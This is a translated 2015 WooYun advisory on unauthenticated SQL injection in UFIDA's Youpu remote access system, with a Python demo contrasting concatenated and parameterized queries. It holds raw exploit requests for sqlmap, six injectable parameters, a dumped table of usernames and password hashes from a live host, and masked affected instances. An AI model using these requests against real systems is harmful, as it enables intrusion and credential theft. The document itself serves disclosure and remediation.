
Vulnerability summary

Defect ID: wooyun-2015-0152899

Title: SQL injection in the UFIDA Youpu (用友优普) Remote Quick Access System (no login required / affects a large number of enterprises)

Vendor: UFIDA Software (用友软件)

Author: 路人甲

Submitted: 2015-11-09 18:44

Fixed: 2015-12-17 14:48

Published: 2015-12-17 14:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-09: Details sent to the vendor; awaiting vendor response
2015-11-10: Vendor confirmed; details visible to the vendor only
2015-11-13: Details opened to third-party security partners (NSFOCUS 绿盟科技, 唐朝安全巡航)
2016-01-04: Details opened to core white hats and domain experts
2016-01-14: Details opened to regular white hats
2016-01-24: Details opened to intern white hats
2015-12-17: Details made public

Summary:

SQL injection in a general-purpose UFIDA platform (no login required, unrestricted data extraction, affects a large number of enterprises)

Details:

The affected system is UFIDA's Youpu U8 platform, which has a very large user base; testing shows the issue affects every enterprise and institution that deploys it.
The injected query runs with MySQL root privileges, so an attacker can write files (for example with SELECT ... INTO OUTFILE, which needs the FILE privilege that root holds and a secure_file_priv setting that permits the target path) and escalate from there.
The injection point is: http://xxxx/Server/CmxItem.php?pgid=System_UpdateSave
The TeamName field of the POST body is injectable; the remaining injection points are listed further down.
The host **.**.**.**:81 is used as the example below.
The raw request is given first; the PHPSESSID it carries is an unauthenticated session, no login is needed. Save the request as a text file (XXX.txt) and pass it to sqlmap with -r to reproduce.

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

TeamName=test


Injection point information as reported by sqlmap:

[Screenshot: injection point information (注入点信息.JPG)]


Databases present on the system:

[Screenshot: database list (database.JPG)]


Tables in the database (sqlmap output, 72 tables):

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers |
| hbadminrolerestrictedorgs |
| hbadminroletask |
| hbadminroleusermembers |
| hbclientgroupapplication |
| hbclientgroupprinter |
| hbdirectoryapplication |
| hborgapplication |
| hborglicensepolicy |
| hborgpolicy |
| hbpolicyvalues |
| hbroletask |
| hbserverapplication |
| hbserverprinterdriver |
| hbserverprintinf |
| hbserverrole |
| hbservertask |
| hbtaskaction |
| hbtaskcondition |
| hbuserapplication |
| hbuserdirectory |
| hbuserorgs |
| hbuserpolicy |
| lograsarchi |
| lograsconcurrenta |
| lograsconcurrentus |
| lograsent |
| lograssessi |
| lograstaskactionhist |
| lograstaskhist |
| oemuserinfo |
| rasactions |
| rasadminroles |
| rasadmintasks |
| rasapplication |
| rasbadprinterdriver |
| rascfg |
| rasclient |
| rasclientgroup |
| rascompatibilitydriver |
| rasconcurrentsession |
| rasconditions |
| rasconnectionsetting |
| rasdatabase |
| rasdirectory |
| rasdmzserverd |
| rasdomain |
| rasgroupuser |
| rasinfocollectordata |
| rasjobs |
| rasjobsteps |
| raslicenseinfo |
| raslicensetoken |
| raslicpolicy |
| raslockdownpolicies |
| rasmonthlyminute |
| rasorgs |
| rasprinter |
| rasprinterdriver |
| rasproductk |
| rasreqids |
| rasroles |
| rasrunningservers |
| rasselection |
| rasserver |
| rasstyle |
| rastasks |
| rasticketing |
| rastimedsessio |
| rasuser |
| rasusermng |
| usermachines |
+---------------------------+


User accounts from the rasuser table (the Password column holds 32-character hex values, consistent with unsalted MD5 digests; the report does not state the hashing scheme):

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
Table: rasuser
[7 entries]
+-----------+----------------------------------+
| UserName  | Password                         |
+-----------+----------------------------------+
| RAS_01    | 0077721c169fad8e3e5aed60729d3e77 |
| RAS_demo  | 2ac9b6c89caa8519103dc34b3d430e6a |
| Ras_admin | 47c1eb03755b751363eea24fb149f616 |
| RAS_07    | 49786e43a863aafd294ea260d270af78 |
| RAS_03    | 6668367528ad4f69171224e12c65626f |
| RAS_02    | 78fbbcc6c709ddd4168bde5c32105f26 |
| RAS_04    | ae555894eeb17518168bde5c32105f26 |
+-----------+----------------------------------+


The other five injection points
The following five POST parameters are also injectable; the payload and exploitation are the same as for TeamName:
TeamDescription
LogRasArchiPurgeDays
LogRasEntPurgeDays
LogUsagePurgeDays
JobRecordsPurgeDays

Example request for TeamDescription (Content-Length must match the body, 20 bytes here):

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

TeamDescription=test


Finally, some affected instances (hosts masked by WooYun):

**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8001/download.php
http://**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php

Proof of vulnerability:

See the Details section above.

Fix:

Filter and validate the input. Filtering alone is fragile; the robust fix is to pass every POST value to MySQL as a bound parameter of a prepared statement (mysqli or PDO in PHP) and to stop connecting as the MySQL root account, so that even a residual injection cannot write files or reach other databases.
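As an added example (not code from the original report or from UFIDA's product), the Python script below demonstrates two things the Details and Fix sections describe: the boolean-based blind probe that confirms injection in each of the six listed POST parameters, and the difference between a string-concatenated query and a parameterized one. It also builds the raw request file for sqlmap -r with Content-Length computed from the body. The table name rascfg, its column layout, the host target.example:81 and the day-count baseline values are assumptions; SQLite stands in for MySQL so the example runs offline.

```python
"""Boolean-based blind SQL injection probe for the six POST parameters, run
against two constructed back ends: one that concatenates the value into SQL
(the bug class this report describes) and one that binds it as a parameter.
SQLite stands in for MySQL so the example runs offline."""
import sqlite3
from typing import Callable, Dict
from urllib.parse import urlencode

# The six POST parameters the report lists as injectable in
# /Server/CmxItem.php?pgid=System_UpdateSave.
INJECTABLE_PARAMS = [
    "TeamName", "TeamDescription", "LogRasArchiPurgeDays",
    "LogRasEntPurgeDays", "LogUsagePurgeDays", "JobRecordsPurgeDays",
]
# Benign baseline value per parameter (assumption: the *PurgeDays fields hold day counts).
BASE_VALUES = {p: ("30" if p.endswith("PurgeDays") else "test") for p in INJECTABLE_PARAMS}


def build_request(param: str, value: str, host: str = "target.example:81") -> str:
    """Raw request in the shape the report feeds to `sqlmap -r`, with the body
    URL-encoded and Content-Length computed rather than hard-coded."""
    body = urlencode({param: value})
    return (
        "POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "\r\n%s" % (host, len(body.encode()), body)
    )


def _seed_db() -> sqlite3.Connection:
    """Constructed stand-in for the rasdatabase schema: one settings row whose
    column names are the report's parameter names (table name assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rascfg (%s)" % ", ".join("%s TEXT" % p for p in INJECTABLE_PARAMS))
    conn.execute("INSERT INTO rascfg VALUES (%s)" % ", ".join("?" * len(INJECTABLE_PARAMS)),
                 [BASE_VALUES[p] for p in INJECTABLE_PARAMS])
    return conn


def vulnerable_handler(conn: sqlite3.Connection, param: str, value: str):
    """String-concatenated WHERE clause: a quote in `value` rewrites the query."""
    sql = "SELECT COUNT(*) FROM rascfg WHERE %s = '%s'" % (param, value)
    try:
        return conn.execute(sql).fetchone()[0]
    except sqlite3.Error as exc:  # a real app would surface this as a DB error page
        return "error: %s" % exc


def fixed_handler(conn: sqlite3.Connection, param: str, value: str):
    """Column name checked against an allow-list, value bound as a parameter,
    so quotes in `value` are data and cannot change the query structure."""
    if param not in INJECTABLE_PARAMS:
        raise ValueError("unknown field: %s" % param)
    sql = "SELECT COUNT(*) FROM rascfg WHERE %s = ?" % param
    return conn.execute(sql, (value,)).fetchone()[0]


def is_injectable(send: Callable[[str, str], object], param: str, base: str) -> bool:
    """Boolean-based blind probe: a tautology appended to the benign value must
    leave the response unchanged and a contradiction must change it. Both
    halves matter; a bare syntax error also differs from the baseline but
    proves nothing by itself. Against a live target, normalise responses first
    (strip timestamps, session ids, CSRF tokens) or every comparison is noise."""
    baseline = send(param, base)
    tautology = send(param, base + "' AND '1'='1")
    contradiction = send(param, base + "' AND '1'='2")
    return baseline == tautology and tautology != contradiction


def scan(handler: Callable[[sqlite3.Connection, str, str], object]) -> Dict[str, bool]:
    """Probe every listed parameter against the given back end."""
    conn = _seed_db()

    def send(param: str, value: str):
        return handler(conn, param, value)

    return {p: is_injectable(send, p, BASE_VALUES[p]) for p in INJECTABLE_PARAMS}


if __name__ == "__main__":
    print(build_request("TeamDescription", "test"))
    print("concatenated query:", scan(vulnerable_handler))  # every parameter True
    print("parameterized query:", scan(fixed_handler))      # every parameter False
```

The probe needs both halves of the comparison: sqlmap's boolean-based technique reports a parameter only when the tautology reproduces the baseline and the contradiction diverges from it, which is exactly what the concatenated handler shows and the parameterized handler does not. The allow-list on the column name in fixed_handler is there because identifiers cannot be bound as parameters; only values can.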

Copyright: please credit 路人甲@乌云 (WooYun) when reposting.


Vendor response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2015-11-10 14:03

Vendor reply:

Developers have been assigned to fix the vulnerability.

Latest status:

None

